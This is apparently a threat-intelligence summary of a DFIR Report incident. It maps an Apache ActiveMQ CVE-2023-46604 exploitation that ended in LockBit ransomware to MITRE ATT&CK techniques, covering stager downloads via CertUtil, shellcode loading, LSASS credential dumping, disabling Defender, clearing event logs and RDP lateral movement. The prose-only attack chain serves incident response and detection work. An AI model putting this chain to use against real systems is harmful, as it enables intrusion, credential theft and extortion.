Apache ActiveMQ Exploit Leads to LockBit Ransomware – The DFIR Report

MITRE Techniques

• [T1190 ] Exploit Public-Facing Application – Exploited CVE-2023-46604 in Apache ActiveMQ by sending a malicious OpenWire Exception Response with a Java Spring ClassPathXmlApplicationContext pointing to a malicious XML payload (‘RCE was accomplished by sending the Java Spring org.springframework.context.support.ClassPathXmlApplicationContext class, along with a URL to a maliciously crafted Java Spring bean configuration XML file’).
• [T1105 ] Ingress Tool Transfer – Downloaded the Metasploit stager and other executables using CertUtil to retrieve payloads from a remote host (‘downloaded and executed a Metasploit stager named uFSyLszKsuR.exe using CertUtil as the download tool’).
• [T1059.001 ] PowerShell – Used obfuscated PowerShell and in-memory shellcode loading to execute staged code (Base64 → VirtualAlloc → CreateThread flow) (‘This code performs the following actions: Converts a Base64-encoded string … Allocates memory … Creates a new thread to execute the code in the allocated memory’).
• [T1059.003 ] Command and Scripting Interpreter: Windows CMD – Created and executed batch scripts (rdp.bat) and ran CMD commands to enable RDP, open ports, and remove artifacts (‘After the creation of the rdp.bat file, several commands were executed via a CMD process to modify the host configuration, specifically to permit RDP through the firewall and set the RDP port number to 3389’).
• [T1569.002 ] System Services: Service Execution – Created and used services (e.g., kesknq) to execute payloads and escalate privileges via Meterpreter/getsystem behavior (‘we observed the creation of a new service named kesknq’ and ‘This pattern of activity is commonly associated with running the getsystem command in a Meterpreter shell’).
• [T1003.001 ] OS Credential Dumping: LSASS Memory – Accessed LSASS process memory to harvest credentials used for later lateral movement and RDP access (‘LSASS process memory was accessed on the beachhead by the Metasploit process’).
• [T1021.001 ] Remote Services: Remote Desktop Protocol (RDP) – Used RDP extensively for lateral movement and interactive ransomware deployment across backup, file, and other servers (‘They then began using RDP to log into other servers, including a backup server and a file server’).
• [T1543.003 ] Create or Modify System Process: Windows Service – Installed AnyDesk which created a service configured to AutoStart for persistent remote access (‘AnyDesk application created a service and configured it to AutoStart’).
• [T1218.011 ] Signed Binary Proxy Execution: SystemSettingsAdminFlows.exe – Abused the legitimate SystemSettingsAdminFlows.exe binary to disable Windows Defender settings (LOLBIN abuse) (‘the threat actor used a legitimate Windows executable, SystemSettingsAdminFlows.exe … This LOLBIN was used to disable Windows Defender settings on the server’).
• [T1070.001 ] Indicator Removal on Host: Clear Windows Event Logs – Cleared System, Application, and Security event logs to hinder detection and investigation (‘the threat actor was observed clearing out both System and Application event logs … as well as clearing the Security event logs’).
• [T1071 ] Application Layer Protocol: C2 – Metasploit stager and C2 communicated with 166.62.100[.]52 (port 2460 observed) and AnyDesk logins tied to the same IP, linking exploit and later activity (‘communicated with 166.62.100[.]52’ and ‘Logged in from 166.62.100.52:6761’).
• [T1486 ] Data Encrypted for Impact – Deployed LockBit ransomware (LB3_pass.exe, LB3.exe) to encrypt systems, drop ransom notes, and change desktop backgrounds (‘These files were LockBit ransomware executables’ and ‘ransom notes were written to directories across affected hosts as the systems were encrypted’).